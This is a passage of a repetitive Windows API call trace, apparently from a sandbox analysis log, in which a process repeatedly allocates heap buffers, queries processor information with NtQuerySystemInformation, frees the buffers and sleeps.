hHeap=0x2560000) returned 1 [0243.600] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.600] Sleep (dwMilliseconds=0x110) [0243.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0243.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0243.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0243.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0243.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0243.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0243.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0243.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0243.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.613] Sleep (dwMilliseconds=0x110) [0243.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0243.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0243.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0243.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0243.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0243.645] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0243.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0243.645] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0243.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.646] Sleep (dwMilliseconds=0x110) [0243.653] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0243.653] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0243.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0243.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0243.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0243.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0243.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0243.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0243.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.657] Sleep (dwMilliseconds=0x110) [0243.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0243.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0243.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0243.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0243.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0243.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0243.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0243.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0243.678] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.678] Sleep (dwMilliseconds=0x110) [0243.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0243.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0243.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0243.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0243.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0243.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0243.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0243.694] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.695] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0243.695] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.695] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.696] Sleep (dwMilliseconds=0x110) [0243.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0243.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0243.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0243.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0243.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0243.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0243.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0243.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0243.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.722] Sleep (dwMilliseconds=0x110) [0243.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0243.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0243.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0243.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0243.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0243.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0243.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0243.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0243.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.738] Sleep (dwMilliseconds=0x110) [0243.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0243.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0243.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0243.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0243.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0243.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0243.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0243.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0243.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.755] Sleep (dwMilliseconds=0x110) [0243.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0243.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0243.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0243.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0243.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0243.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0243.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0243.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0243.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.771] Sleep (dwMilliseconds=0x110) [0243.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0243.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0243.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0243.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0243.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0243.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0243.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0243.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0243.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.786] Sleep (dwMilliseconds=0x110) [0243.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0243.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0243.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0243.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0243.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0243.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0243.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0243.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0243.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.801] Sleep (dwMilliseconds=0x110) [0243.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0243.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0243.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0243.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0243.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0243.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0243.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0243.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0243.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.817] Sleep (dwMilliseconds=0x110) [0243.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0243.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0243.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0243.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0243.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0243.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0243.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0243.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0243.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.830] Sleep (dwMilliseconds=0x110) [0243.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0243.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0243.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0243.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0243.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0243.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0243.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0243.848] NtQuerySystemInformation 